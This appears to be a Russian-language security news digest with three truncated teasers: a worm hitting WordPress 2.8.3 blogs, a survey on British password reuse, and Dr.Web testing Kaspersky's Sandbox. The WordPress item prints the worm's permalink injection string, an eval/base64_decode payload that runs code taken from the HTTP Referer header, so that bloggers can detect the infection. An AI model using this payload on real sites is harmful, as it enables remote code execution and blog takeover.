Месяц назад стало известно о новой критической уязвимости в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. После этого вышел WordPress 2.8.4, устраняющий эту уязвимость. Однако, как оказалось, далеко не все блогеры следят за обновлениями.  В эти выходные разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8.  Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы пользователей и начинает добавлять спам и ссылки на вредоносный контент в архивные топики.  Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие следующего кода.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ ... Читать дальше »

Растущая активност, изобретательность разнообразных кибермошенников мало беспокоит рядовых обитателей Интернета. На примере недавно проведённых исследований компанией СРР, для защиты доступа к самым разным своим сайтам почти половина британских пользователей использует один и тот же пароль. 46% интернет-пользователей Великобритании признались, что их аккаунты в социальных сетях, банковских сервисах и онлайн магазинах защищены одним и тем же паролем. Еще 8% использует на разных сайтах вариации на тему все того же единственного исходного пароля. Очевидно, что не все сайты обеспечивают высокий уровень защиты от фишинга, по этому однажды получив в свое распоряжение ваш пароль, мошенники смогут проникнуть во все остальные аккаунты пользователя. Кроме того, в исследовании отмечается, любовь интернет-пользователей к незатейливым и примитивным паролям. Хотя многие интернетчики перестали использовать пароли вроде "123456" и "qwerty", все же разнообразием секретные слова бри ... Читать дальше »

Технология Sandbox («песочницы» или Green Zone — «безопасной среды»), впервые появившаяся в комплексном решении Kaspersky Internet Security 2010 (антивирус, антиспам, защита от атак), привлекла пристальное внимание конкурентов ЛК. Напомним, что Sandbox позволяет запускать подозрительные программы и веб-сайты в изолированном виртуальном пространстве.

 «Мы не могли удержаться от тестирования новой технологии наших коллег, — говорят представители  компании . «Доктор Веб». — Поскольку идея «песочниц» не нова и довольно много антивирусных компаний уже долгое время имеют схожие разработки, а также в связи с тем, что наша антивирусная лаборатория постоянно ведет исследования в этой области, подобная информация, естественно, представляет для нас большой интерес».

«Для выполнения первого теста файловый менеджер FAR был помещен в «песочни ... Читать дальше »